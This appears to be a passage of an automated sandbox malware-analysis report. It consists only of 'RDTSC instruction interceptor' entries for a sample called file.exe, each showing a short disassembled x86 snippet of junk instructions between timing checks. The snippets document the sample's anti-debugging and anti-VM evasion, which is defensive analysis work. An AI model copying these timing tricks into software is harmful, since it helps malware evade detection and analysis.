Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 322A26 second address: 322A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37282B second address: 372843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 372843 second address: 372849 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 372849 second address: 37284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37284F second address: 372855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3766F9 second address: 376706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB6784C8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376706 second address: 37671D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB678E7E6F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37671D second address: 376760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jne 00007FB6784C8BD6h 0x0000000c jmp 00007FB6784C8BE9h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007FB6784C8BE7h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376760 second address: 376787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007FB678E7E6F4h 0x0000000b jmp 00007FB678E7E6EEh 0x00000010 jp 00007FB678E7E6F2h 0x00000016 jne 00007FB678E7E6E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 375EA1 second address: 375EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BDFh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jbe 00007FB6784C8BDCh 0x00000011 jnc 00007FB6784C8BECh 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FB6784C8BD6h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37601A second address: 37602A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FB678E7E6E6h 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37602A second address: 376034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376158 second address: 37615C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37615C second address: 376160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376160 second address: 376166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376166 second address: 37616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37616F second address: 376176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 376176 second address: 376180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37DCC8 second address: 37DCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37DCD0 second address: 37DCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37DCD4 second address: 37DCE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37DCE8 second address: 37DD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB6784C8BE3h 0x0000000f push ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E2F26 second address: 2E2F2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37BE8E second address: 37BE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37BE98 second address: 37BE9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37C367 second address: 37C36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37C61B second address: 37C623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CAD9 second address: 37CADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CADF second address: 37CAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CAE6 second address: 37CAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CAEC second address: 37CB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB678E7E6F9h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB678E7E6F2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CB20 second address: 37CB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CDDC second address: 37CE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6EDh 0x00000009 jmp 00007FB678E7E6EBh 0x0000000e popad 0x0000000f jo 00007FB678E7E704h 0x00000015 pushad 0x00000016 jmp 00007FB678E7E6EEh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37CE12 second address: 37CE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D0FC second address: 37D103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D103 second address: 37D11B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB6784C8BD6h 0x00000009 jno 00007FB6784C8BD6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D11B second address: 37D12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6EBh 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D12E second address: 37D139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D139 second address: 37D14E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D425 second address: 37D437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB6784C8BD6h 0x0000000a jo 00007FB6784C8BD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 37D9E5 second address: 37D9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 382F96 second address: 382FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB6784C8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jno 00007FB6784C8BEAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3834F4 second address: 3834F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3834F8 second address: 383511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6784C8BE3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 383511 second address: 383517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 383517 second address: 38351D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38351D second address: 383527 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB678E7E6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3837AC second address: 3837B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3837B0 second address: 3837CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EEh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB678E7E6E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 383931 second address: 383949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 383949 second address: 383961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 383961 second address: 383965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3901B7 second address: 3901BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3901BE second address: 3901C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E2F3 second address: 38E304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB678E7E6EBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E304 second address: 38E32B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB6784C8BDCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E32B second address: 38E342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E90B second address: 38E932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6784C8BDFh 0x0000000c jmp 00007FB6784C8BE1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAF0 second address: 38EAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FB678E7E6E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAFC second address: 38EB1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB1D second address: 38EB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB21 second address: 38EB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6784C8BDBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38F078 second address: 38F08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38F08C second address: 38F0BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB6784C8BE7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FB6784C8BDBh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38F0BC second address: 38F0E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB678E7E6FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB678E7E6E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38F967 second address: 38F977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jg 00007FB6784C8BE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AAA7B second address: 3AAA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AAA81 second address: 3AAA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AABB6 second address: 3AABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB678E7E6ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AABCA second address: 3AABDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AABDE second address: 3AAC00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jp 00007FB678E7E6E6h 0x0000000f jmp 00007FB678E7E6F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF74B second address: 3AF75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FB6784C8BD6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF75A second address: 3AF760 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF760 second address: 3AF769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C2D9C second address: 3C2DAE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB678E7E6ECh 0x00000008 jbe 00007FB678E7E6E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C1C3C second address: 3C1C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C206F second address: 3C2075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C571E second address: 3C5732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BDEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D5226 second address: 3D5257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB678E7E705h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D5257 second address: 3D5264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FB6784C8BEFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D5264 second address: 3D527B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D527B second address: 3D5283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7C8E second address: 3D7C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7C94 second address: 3D7CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6784C8BE2h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FB6784C8BD6h 0x00000012 jmp 00007FB6784C8BE8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7CCB second address: 3D7CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB678E7E6F5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7CFA second address: 3D7D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7D00 second address: 3D7D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7D04 second address: 3D7D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7D0A second address: 3D7D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D9C20 second address: 3D9C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FB6784C8BE3h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB6784C8BDBh 0x00000018 popad 0x00000019 push ecx 0x0000001a jmp 00007FB6784C8BE1h 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D9C68 second address: 3D9C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD962 second address: 3DD96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD96C second address: 3DD970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DD970 second address: 3DD978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DF2B4 second address: 3DF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DF2BA second address: 3DF2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DF2C3 second address: 3DF2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3DF2C7 second address: 3DF2CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DC2F1 second address: 2DC2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DC2F5 second address: 2DC314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6784C8BE6h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3EF821 second address: 3EF82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6EAh 0x00000009 rdtsc
